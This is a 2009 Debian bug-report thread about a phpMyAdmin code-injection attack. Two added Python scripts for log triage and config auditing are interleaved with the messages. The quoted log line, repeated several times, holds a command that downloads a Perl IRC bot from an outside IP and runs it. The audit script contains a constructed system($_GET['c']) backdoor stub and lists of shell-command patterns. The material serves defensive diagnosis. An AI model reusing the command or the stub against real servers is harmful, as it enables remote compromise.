Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
Package: phpmyadmin
Version: 4:2.11.8.1-5+lenny1
Severity: critical
Tags: security
Justification: root security hole

Hi,

After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url:

82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null;

It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit. It is basically an IRC bot.

-- System Information:
Debian Release: 5.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores)
Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15)
Shell: /bin/sh linked to /bin/bash

Versions of packages phpmyadmin depends on:
ii  debconf [debconf-2   1.5.24                 Debian configuration management sy
ii  libapache2-mod-php   5.2.6.dfsg.1-1+lenny3  server-side, HTML-embedded scripti
ii  perl                 5.10.0-19              Larry Wall's Practical Extraction
ii  php5                 5.2.6.dfsg.1-1+lenny3  server-side, HTML-embedded scripti
ii  php5-cgi             5.2.6.dfsg.1-1+lenny3  server-side, HTML-embedded scripti
ii  php5-mcrypt          5.2.6.dfsg.1-1+lenny3  MCrypt module for php5
ii  php5-mysql           5.2.6.dfsg.1-1+lenny3  MySQL module for php5

Versions of packages phpmyadmin recommends:
ii  apache2              2.2.9-10+lenny3        Apache HTTP Server metapackage
ii  apache2-mpm-prefor   2.2.9-10+lenny3        Apache HTTP Server - traditional n
ii  php5-gd              5.2.6.dfsg.1-1+lenny3  GD module for php5

Versions of packages phpmyadmin suggests:
ii  mysql-server-5.0 [mysq  5.0.51a-24+lenny1   MySQL database server binaries

-- debconf information:
  phpmyadmin/setup-username: admin
* phpmyadmin/reconfigure-webserver:
  phpmyadmin/restart-webserver: false
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
Hi Laurant,

> After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url:
>
> 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null
>
> It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit. It is basically an IRC bot.

Version 4:2.11.8.1-5+lenny1 of phpmyadmin, which you say you have installed, has been released last Thursday with 1824-1, specifically to address this issue. So if all is right then you should be safe from this issue.

Can you explain why you think phpMyAdmin in Lenny is still vulnerable to this issue?

thanks,
Thijs
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
Hi

On Mon, 29 Jun 2009 10:58:18 +0200 Thijs Kinkhorst th...@debian.org wrote:
> Hi Laurant,
>
> > After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url:
> >
> > 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null
> >
> > It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit. It is basically an IRC bot.
>
> Version 4:2.11.8.1-5+lenny1 of phpmyadmin, which you say you have installed, has been released last Thursday with 1824-1, specifically to address this issue. So if all is right then you should be safe from this issue.
>
> Can you explain why you think phpMyAdmin in Lenny is still vulnerable to this issue?

phpMyAdmin is not vulnerable, but the exploited config file is still there even after the upgrade.

-- 
Michal Čihař | http://cihar.com | http://blog.cihar.com
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
On Monday 29 June 2009, Michal Čihař wrote:
> > > 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null
> > >
> > > It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit. It is basically an IRC bot.
> >
> > Version 4:2.11.8.1-5+lenny1 of phpmyadmin, which you say you have installed, has been released last Thursday with 1824-1, specifically to address this issue. So if all is right then you should be safe from this issue.
> >
> > Can you explain why you think phpMyAdmin in Lenny is still vulnerable to this issue?
>
> phpMyAdmin is not vulnerable, but the exploited config file is still there even after the upgrade.

Right, but the reporter is basing his report on the presence of log lines trying to exploit the original issue, which should not be possible anymore.

Thijs
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
Hi

On Mon, 29 Jun 2009 13:39:19 +0200 Thijs Kinkhorst th...@debian.org wrote:
> Right, but the reporter is basing his report on the presence of log lines trying to exploit the original issue, which should not be possible anymore.

No, in the log he is using an exploited config file (with some custom code inside).

-- 
Michal Čihař | http://cihar.com | http://blog.cihar.com
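The distinction Michal draws is visible in the access log itself. As an added example (not code from this thread, Debian or phpMyAdmin), the Python below reads Apache log lines and separates probes against the setup script (the hole the package update closed; the script is assumed to live at scripts/setup.php) from direct requests to config.inc.php that carry a shell command, which only achieve anything if code has already been written into that file. The first sample line is the one quoted in the report; the other two are constructed, as is the shell-command heuristic.

```python
"""Triage phpMyAdmin access-log lines: setup-script probes vs. backdoor use.

Added example for this thread; not Debian or phpMyAdmin code.  The first
sample line is the one quoted in the bug report, the other two are
constructed; the setup script is assumed to live at scripts/setup.php.
"""
import re
from urllib.parse import unquote

# Client, timestamp, method and request target of an Apache access-log line.
# The optional quote lets it accept both the bare line pasted in the report
# and the usual "GET /path HTTP/1.1" form.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "?(?P<method>[A-Z]+) (?P<target>\S+)'
)

# Heuristic tokens that mark a query value as a shell command rather than data.
SHELL_HINTS = ("wget ", "curl ", "perl ", "/tmp/", ";", "|", ">>")

SETUP_SCRIPT = "/scripts/setup.php"   # assumed path of the (fixed) setup script


def decode_query(query):
    """Split a raw query string into decoded (key, value) pairs.

    Done by hand rather than with parse_qsl so that ';' inside the value
    is kept: it is the command separator the attacker relies on.
    """
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((unquote(key), unquote(value.replace("+", " "))))
    return pairs


def looks_like_shell(value):
    return any(hint in value for hint in SHELL_HINTS)


def parse_line(line):
    """Return a dict with client, normalised path and decoded params, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    # Collapse the doubled slashes seen in the report (//phpmyadmin//config.inc.php)
    path = re.sub(r"/{2,}", "/", path)
    return {
        "client": m.group("client"),
        "timestamp": m.group("ts"),
        "path": path,
        "params": decode_query(query),
    }


def classify(entry):
    """Label an entry by what it tells us about the installation."""
    commands = [v for _, v in entry["params"] if looks_like_shell(v)]
    if entry["path"].endswith("/config.inc.php"):
        # phpMyAdmin only ever include()s its config; a direct request to it
        # with a shell command in a parameter only does anything if that
        # command is being handed to code someone already wrote into the file.
        return "backdoor-invocation" if commands else "direct-config-request"
    if entry["path"].endswith(SETUP_SCRIPT):
        # Probe against the original hole; harmless on a patched package.
        return "setup-script-probe"
    return "other"


def triage(log_text):
    results = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is not None:
            entry["verdict"] = classify(entry)
            results.append(entry)
    return results


# First line quoted from the report; the next two are constructed.
SAMPLE_LOG = """\
82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null;
10.0.0.7 - - [29/Jun/2009:03:40:02 +0200] "POST /phpmyadmin/scripts/setup.php HTTP/1.1" 404 -
10.0.0.9 - - [29/Jun/2009:09:12:44 +0200] "GET /phpmyadmin/index.php?db=test HTTP/1.1" 200 -
"""

if __name__ == "__main__":
    for e in triage(SAMPLE_LOG):
        print(f"{e['verdict']:22} {e['client']:14} {e['path']}")
        for k, v in e["params"]:
            print(f"{'':22} {k} = {v!r}")
```

Run it with no arguments to see the three verdicts; feed it a real access log by reading the file into `triage()`. A hit labelled `backdoor-invocation` means the host was compromised before the update, so the right response is the one Thijs gives later in the thread: treat the installation as attacker-controlled rather than rely on the upgraded package.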
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
On Monday 29 June 2009, Michal Čihař wrote:
> No, in the log he is using an exploited config file (with some custom code inside).

Ah right. I don't think there's a way we can realistically do anything about an already-compromised installation. That is a general truth for any vulnerability: how can we know to what extent the attacker has influenced the system?

We could release a fix of config.inc.php which rejects requests specific to the worm that was released. But this is an incomplete fix necessarily. Wouldn't that bring a false sense of security?

Thijs
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
Hi

On Mon, 29 Jun 2009 14:07:50 +0200 Thijs Kinkhorst th...@debian.org wrote:
> Ah right. I don't think there's a way we can realistically do anything about an already-compromised installation. That is a general truth for any vulnerability: how can we know to what extent the attacker has influenced the system?
>
> We could release a fix of config.inc.php which rejects requests specific to the worm that was released. But this is an incomplete fix necessarily. Wouldn't that bring a false sense of security?

Well, most problems come from the fact that the setup script is not protected when the user does not use our config snippets for the webserver (otherwise the setup script would be password protected and it would not be an issue). In this case we can try to check for some things (like usage of system()), but you're right, this would be an incomplete fix.

Anyway we should somehow protect against such situations (an unprotected setup script which can change the configuration). Maybe making /var/lib/phpmyadmin/config.inc.php writable for www-data only if the user has enabled our snippets through debconf?

-- 
Michal Čihař | http://cihar.com | http://blog.cihar.com
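Michal's two suggestions, checking the config for things like system() and making sure the web server account cannot write it, can be turned into an admin-side audit. The Python below is an added example for this thread, not Debian's or phpMyAdmin's own code: it blanks out comments and string literals before looking for execution functions, request variables and the backtick operator, so a hostname or a comment cannot trigger it, and it reports whether the file's owner, group or mode lets the web server rewrite it. The sample configs are constructed, the planted stub is illustrative, and uid/gid 33 for www-data is Debian's default, assumed here.

```python
"""Check a phpMyAdmin config.inc.php for planted code and loose permissions.

Added example for this thread, not Debian's or phpMyAdmin's own code.  It
does the two things Michal suggests: look for calls that have no business
in a configuration file (system() and friends, reading request variables)
and check whether the web server account could rewrite the file.  The
sample configs are constructed; uid/gid 33 for www-data is Debian's default
and is assumed here.
"""
import os
import re
import stat
import sys
from collections import namedtuple

# One pass removes comments and string literals; the leftmost match wins, so
# a URL inside a string is not mistaken for a // comment and vice versa.
STRIP_RE = re.compile(
    r"/\*.*?\*/"                # block comment
    r"|//[^\n]*|#[^\n]*"        # line comments
    r"|'(?:\\.|[^'\\])*'"       # single-quoted string
    r'|"(?:\\.|[^"\\])*"',      # double-quoted string
    re.S,
)
DANGEROUS_CALLS = ("system", "exec", "shell_exec", "passthru", "popen",
                   "proc_open", "eval", "assert", "create_function")
CALL_RE = re.compile(r"\b(" + "|".join(DANGEROUS_CALLS) + r")\s*\(")
REQUEST_VAR_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")


def strip_strings_and_comments(src):
    """Blank out comments and strings, keeping newlines so line numbers hold."""
    return STRIP_RE.sub(lambda m: re.sub(r"[^\n]", " ", m.group(0)), src)


def scan_config(src):
    """Return (line, kind, what) for every suspicious construct in PHP source."""
    findings = []
    for lineno, line in enumerate(strip_strings_and_comments(src).splitlines(), 1):
        for m in CALL_RE.finditer(line):
            findings.append((lineno, "call", m.group(1)))
        for m in REQUEST_VAR_RE.finditer(line):
            findings.append((lineno, "request-var", m.group(0)))
        if "`" in line:                       # backtick operator == shell_exec
            findings.append((lineno, "backtick", "`"))
    return findings


FileIdentity = namedtuple("FileIdentity", "mode uid gid")


def identity_of(path):
    st = os.stat(path)
    return FileIdentity(stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)


def writable_by_web(ident, web_uid=33, web_gid=33):
    """Reasons the web server account could rewrite the file (empty == fine)."""
    reasons = []
    if ident.mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if ident.uid == web_uid and ident.mode & stat.S_IWUSR:
        reasons.append("owned by the web server user and user-writable")
    if ident.gid == web_gid and ident.mode & stat.S_IWGRP:
        reasons.append("group-writable by the web server group")
    return reasons


def audit(path, web_uid=33, web_gid=33):
    """Combine both checks for a file on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return {"code": scan_config(src),
            "permissions": writable_by_web(identity_of(path), web_uid, web_gid)}


# Constructed sample in the shape of a Debian-style config.inc.php.
CLEAN_CONFIG = """<?php
/* constructed sample config */
$cfg['blowfish_secret'] = 'change-me';
$i = 0;
$i++;
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['auth_type'] = 'cookie';  // see http://example.invalid/docs
$cfg['Servers'][$i]['extension'] = 'mysql';
?>
"""
# The same file with an illustrative command-execution stub appended, the
# kind of "custom code" an attacker leaves behind via an unprotected setup
# script.  Constructed for the demo, not taken from a real compromise.
BACKDOORED_CONFIG = CLEAN_CONFIG.replace(
    "?>", "if (isset($_GET['c'])) { system($_GET['c']); }\n?>")

if __name__ == "__main__":
    if len(sys.argv) > 1:                      # audit a real file
        print(audit(sys.argv[1]))
    else:
        print("clean:     ", scan_config(CLEAN_CONFIG))
        print("backdoored:", scan_config(BACKDOORED_CONFIG))
```

`python3 audit.py /var/lib/phpmyadmin/config.inc.php` runs both checks on a real install. A non-empty `code` list is the signal Thijs and Michal agree no package update can give: the file already holds someone else's code and the host needs incident handling, not a reinstall of phpmyadmin. A non-empty `permissions` list is the condition Michal wants debconf to control, since a config the web server can write is exactly what an unprotected setup script needs.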